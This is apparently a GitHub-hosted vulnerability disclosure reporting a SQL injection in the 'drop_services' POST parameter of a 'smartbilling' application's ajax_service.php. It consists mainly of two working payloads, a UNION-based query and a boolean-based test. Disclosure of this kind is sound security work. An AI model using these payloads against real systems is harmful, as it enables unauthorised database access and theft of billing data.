Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

BUG_Author:yastar

Vulnerability File: /smartbilling_source_code/ajax_service.php

POST parameter 'drop_services' exists SQL injection vulnerability

Payload1:drop_services=-1' union all select null,null,null,null,concat(0x616263,0x2526272829),null,null,null,null-- -

image

Payload2:drop_services=1' and 999=999 and 'h'='h

Boolean judgment is correct, and the page displays normally

image